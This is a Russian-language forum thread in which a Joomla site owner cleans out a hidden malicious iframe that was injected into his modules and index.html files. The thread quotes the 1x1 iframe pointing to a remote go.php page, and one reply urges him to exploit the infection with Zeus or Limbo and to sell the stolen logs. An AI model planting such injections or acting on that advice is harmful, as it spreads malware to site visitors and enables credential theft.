Имеется информация, что этот сайт атакует компьютеры!

разрешилась наконец то эта проблема.
зашел на панель веб-мастера в гугл, зарегистрировал там свой сайт, а потом там просто тупо кнопочку надо было нажать чтоб пересмотрели все проблемы в гугле. понадобились всего сутки. так что если у кого подобная проблема будет, делайте так же. и всем гранд мерси кто откликнулся.

 

О чем я и писал выше

 

Опять старая проблема. В основном пользуюсь файрфоксом. Когда с него захожу на свой сайт , никаких проблем не возникает. Но зашел сегодня на всякий случай гугл хромом и эксплорером и он мне опять начал выдавать, что мой сайт заражен и проблемы там какие-то. Я зашел на фтп, скачал оттуда все, что там есть, себе в комп. система у меня установлена совсем недавно, на всякие порносайты не захожу, так что вирусы какие то мне негде подхватить, тем более пользуюсь касперским. все что я скачал с фтп, проверил им. проверка не нашла никакое вредоносное ПО. скриншоты прилагаю. и я никак не связан с владельцами тех страниц, чьи домены упоминаются в предупреждении о троянах и о вредоносном ПО. мой комп проверен касперским полностью вчера, в нем он не нашел ничего такого, чего не должно в нем быть. скриншоты прилагаю.
скажите пожалуйста, что делать?

 

На твоем сайте ссылка на http://worldgems.ru/ (в исходном коде index.php) коде вот с него и лезет зараза

 

да, спасибо тебе. действительно если смотреть исходный код страницыы, то там есть эти айфреймы в двух местах. но я посмотрл сам файл индекс.пхп в корне сайта и там нету их. подскажи плиз где их искать

 

Может быть зашифровано, то что вижу

<div class="ja-box-ct clearfix">
<form name="form2" method="post" action="index.php">
</form>
<iframe height="1" frameborder="0" width="1" src="http://worldgems.ru/pics/catalogue/0/go.php?sid=5">

посмотри в ja-box или индех в личку хотя 99% в него подгружается этот фрейм

 

на савмом деле там этот айфрейм в двух местах. первый в том месте где модуль голосование как вы о нас узнали а второй фрейм в модуле где поиск. так что мне кажется что туда он подгружается.

 

кстати решил посмотреть может там на самом деле где то в этих модулях этот айфрейм прописался. посмтрел в модуле поиска и в натуре его там нашел. потом посмотрел модуль и компонент голосования и тоже там этот айфрейм нашел...
потом все это дело стер и щас пока не знаю еще че дальше будет
по крайней мере в хтмл коде страницы уже этих айфреймов нет, но на всякий случай я решил проверить все остальные папки с модулями и прочими делами. и к своему ужасу я там обнаружил что почти в каждом файле с названием типа индекс.хтмл есть этот айфрейм. возможно ли мне это все дело как то устранить. в принципе у меня там нету ничего выдающегося на сайте, чем можно пожертвовать. единственное только датсогалерею жалко. но может какой то способ есть?

 

mod_poll

 

на всякий случай я решил проверить все остальные папки с модулями и прочими делами. и к своему ужасу я там обнаружил что почти в каждом файле с названием типа индекс.хтмл есть этот айфрейм. возможно ли мне это все дело как то устранить. в принципе у меня там нету ничего выдающегося на сайте, чем можно пожертвовать. единственное только датсогалерею жалко. но может какой то способ есть?

 

В дрим вивере запусти автозамену на вредоносного кода на // Либо замени все индекс хтмл на пустые
Поменяй пасс на фтп и админку

 

нни разу ей не пользолвался на самом деле. то есть все что у меня есть на фтп надо на комп накинуть и в нем уже редактировать?

 

Там есть такая функция замена по всему сайту Ctrl+ F (указываешь путь к папке), хоть в коде, хоть в тексте. Где делать, это как удобнее

 

как это возможно реализовать? хотя бы примерный алгоритм

 

не могу почему то никак у себя дримвивер установить. но у меня такой вопрос: у меня сайт же в интернете лежит. я смогу при помощи дримвивера это все отредактировать? просто я щас вручную начал исправлять в резервной копии в компе и там разные иногда айфреймы встречаются. а если такой вариант: просто по очереди все файлы зараженные заменить на которые нормальные из установочного архива а например ту же дастогалерею вручную отремонтировать. будет у меня сайт работать? насколько отличаются файлы в фтп от установочного архива помимо отсутствия в ней папки instalation и прочее. не повредит ли мне замена папаок с зараженными файлами индекс на нормальные?

 

че тут думать то??снимаеш хост по соседству с zeus или limbo,учитываая каталоги которые у тя появились, это именно так ну так кайфуй, логи качаем, парсим, и продаем
что именно тя беспокоит?

 

Вот держи пустой index.html просто берешь и вставляешь его в нужное место, конечно мутрно, но это быстрее чем ты разберешься с дримвивером, ну еще пробегись поиском по файлам сайта через тот же тотал коммандер в поисках вредоносного кода. ) Надеюсь решишь свою проблему )

 

спасибо чувак
у меня в принципе выбора нет. именно этим я и занялся...

 

borodyder, не за что

 

и еще такой вопрос. я почти все файлы с этими айфреймами поменял на нормальные. но сами понимаете, все живые люди, где то че то мог и упустить. при помощи какой проги можно это дело проверить, то есть по какой то конкретной фразе, которая может содержаться в файле индекс.хтмл типа поиска